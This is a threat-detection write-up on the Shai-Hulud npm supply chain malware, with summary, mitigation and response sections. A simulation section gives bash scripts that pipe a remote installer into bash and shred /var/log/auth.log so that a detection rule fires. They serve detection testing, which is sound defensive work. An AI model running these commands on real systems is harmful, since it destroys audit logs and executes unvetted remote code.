SOC Prime Bias: Critical

28 Nov 2025 18:53
newspaper icon about.gitlab.com

Shai-Hulud: Widespread npm Supply Chain Attack

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
Shai-Hulud: Widespread npm Supply Chain Attack
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


SUMMARY

GitLab disclosed a widespread supply chain intrusion aimed at npm ecosystems. The campaign pushes an updated Shai-Hulud malware variant via malicious preinstall scripts. This payload harvests cloud and code-host credentials, funnels data to attacker-controlled GitHub repositories, and spreads further by republishing trojanized packages. A built-in dead man’s switch can wipe or corrupt user files if the attacker’s infrastructure is disrupted.

Investigation

GitLab’s vulnerability research team traced the activity to tainted npm packages whose modified package.json references a setup_bun.js loader. This loader installs the Bun runtime and triggers a bundled bun_environment.js payload that collects credentials, runs Trufflehog to discover secrets, and uploads results to a public GitHub repository. The malware also spins up new GitHub repositories as drop boxes and abuses stolen npm tokens to republish compromised packages. If access to both GitHub and npm is severed, the payload proceeds to delete or overwrite user files.

Mitigation

GitLab recommends that organizations inspect npm dependencies for unexpected preinstall scripts and validate the integrity of published packages. Teams should remove unauthorized setup_bun.js loaders, revoke exposed npm and GitHub tokens, and watch for suspicious GitHub repositories stamped with the marker “Sha1-Hulud: The Second Coming.” Endpoint protection should be configured to block untrusted Node scripts and to detect the destructive command lines documented in the report.

Response

When activity is detected, isolate the impacted system, revoke all compromised credentials, and purge malicious npm packages from internal registries. Perform a forensic review to confirm or rule out data exfiltration and file destruction. Issue fresh credentials for cloud platforms and GitHub, and continuously monitor GitHub for newly created repositories that match the attacker’s marker. Finally, reinforce CI/CD pipelines to prohibit arbitrary preinstall scripts.

Attack Flow

Simulations

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Attack Narrative & Commands

The adversary has gained a foothold on the compromised Linux host. To establish a persistent runtime capable of executing further JavaScript‑based payloads, they download and install the Bun runtime via a one‑liner that streams the installer directly into bash. Immediately after confirming the runtime is present, the attacker triggers a “dead‑man’s switch” (simulated here by a timed sleep) that launches a destructive shred operation to irrecoverably delete a sensitive file (/var/log/auth.log).

The steps are:

  1. Download & install Bun: 
    curl -fsSL https://bun.sh/install | bash
  2. Wait briefly (simulating the switch timing).
  3. Execute destructive shred: 
    shred -uvz -n 1 /var/log/auth.log

Both commands generate process‑creation events that match the Sigma rule’s exact keywords.

Regression Test Script

#!/bin/bash
# -------------------------------------------------
# Simulate Shai‑Hulud “Bun install + shred” behavior
# -------------------------------------------------

# 1️⃣ Install Bun (exact command required for detection)
echo "[*] Installing Bun runtime..."
curl -fsSL https://bun.sh/install | bash

# Short pause to emulate realistic timing
sleep 5

# 2️⃣ Perform destructive file wipe (exact command required)
TARGET_FILE="/var/log/auth.log"
if [[ -f "$TARGET_FILE" ]]; then
    echo "[*] Shredding $TARGET_FILE ..."
    shred -uvz -n 1 "$TARGET_FILE"
else
    echo "[!] Target file not found; creating dummy file for demo."
    echo "dummy data" > "$TARGET_FILE"
    shred -uvz -n 1 "$TARGET_FILE"
fi

echo "[*] Simulation complete."

Cleanup Commands

#!/bin/bash
# -------------------------------------------------
# Cleanup after the Bun/Shred simulation
# -------------------------------------------------

# Remove any residual Bun files (if installed)
if command -v bun >/dev/null 2>&1; then
    echo "[*] Removing Bun runtime..."
    rm -rf "$HOME/.bun"
    rm -f /usr/local/bin/bun
fi

# Recreate the shredded log file (for system stability)
TARGET_FILE="/var/log/auth.log"
if [[ ! -f "$TARGET_FILE" ]]; then
    echo "recreated log placeholder" | sudo tee "$TARGET_FILE" >/dev/null
    sudo chmod 600 "$TARGET_FILE"
fi

echo "[*] Cleanup complete."

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for free